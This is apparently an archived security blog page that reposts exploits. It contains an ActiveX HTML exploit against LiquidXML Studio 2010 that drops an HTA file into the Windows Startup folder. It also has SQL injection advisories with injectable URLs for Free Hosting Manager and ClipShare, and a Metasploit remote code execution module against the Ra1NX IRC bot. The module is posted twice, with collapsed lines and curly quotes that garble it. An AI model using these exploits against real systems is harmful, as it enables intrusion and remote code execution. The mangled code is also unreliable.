Archive for 25 Mart 2013

LiquidXML Studio 2010 ActiveX Remote 0-day

liquidXML-exploit

 

LiquidXML Studio 2010 ActiveX Remote 0-day Exploit

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>

 

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injeçtion açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah ,                                
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In 
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is 

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

$dbquery = ("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : 
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION&#91;&#39;language&#39;&#93;. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST&#91;&#39;gid&#39;&#93;) && is_numeric($_REQUEST&#91;&#39;gid&#39;&#93;) ) ? mysql_real_escape_string($_REQUEST&#91;&#39;gid&#39;&#93;) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: “Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => '”Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
'Author' =>
[
'bwall ' # Ra1NX analysis and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
],
'Platform' => [ 'unix', 'win'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 344,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Targets' =>
[
[ 'Ra1NX', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'March 24 2013',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
], self.class)
end

def check
connect

response = register(sock)
if response =~ /463/ or response =~ /464/
print_error(“#{rhost}:#{rport} – Connection to the IRC Server not allowed”)
return Exploit::CheckCode::Unknown
end
confirm_string = rand_text_alpha(8)
response = send_msg(sock, “PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}rn”)
print response
quit(sock)
disconnect

if response =~ /#{confirm_string}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def send_msg(sock, data)
sock.put(data)
data = “”
begin
read_data = sock.get_once(-1, 1)
while not read_data.nil?
data < < read_data read_data = sock.get_once(-1, 1) end rescue EOFError end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? msg < < "PASS #{datastore['IRC_PASSWORD']}rn" end if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error(“The nick is longer than 9 characters, using #{nick}”)
else
nick = datastore['NICK']
end

msg < < "NICK #{nick}rn" msg < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn" response = send_msg(sock,msg) return response end def ra1nx_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}rn" response = send_msg(sock, command_msg) return response end def quit(sock) quit_msg = "QUIT :bye byern" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...") ra1nx_command(sock) quit(sock) disconnect end end [/sourcecode]

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: “Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => '”Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
'Author' =>
[
'bwall ' # Ra1NX analysis and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
],
'Platform' => [ 'unix', 'win'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 344,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Targets' =>
[
[ 'Ra1NX', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'March 24 2013',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
], self.class)
end

def check
connect

response = register(sock)
if response =~ /463/ or response =~ /464/
print_error(“#{rhost}:#{rport} – Connection to the IRC Server not allowed”)
return Exploit::CheckCode::Unknown
end
confirm_string = rand_text_alpha(8)
response = send_msg(sock, “PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}rn”)
print response
quit(sock)
disconnect

if response =~ /#{confirm_string}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def send_msg(sock, data)
sock.put(data)
data = “”
begin
read_data = sock.get_once(-1, 1)
while not read_data.nil?
data < < read_data read_data = sock.get_once(-1, 1) end rescue EOFError end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? msg < < "PASS #{datastore['IRC_PASSWORD']}rn" end if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error(“The nick is longer than 9 characters, using #{nick}”)
else
nick = datastore['NICK']
end

msg < < "NICK #{nick}rn" msg < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn" response = send_msg(sock,msg) return response end def ra1nx_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}rn" response = send_msg(sock, command_msg) return response end def quit(sock) quit_msg = "QUIT :bye byern" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...") ra1nx_command(sock) quit(sock) disconnect end end [/sourcecode]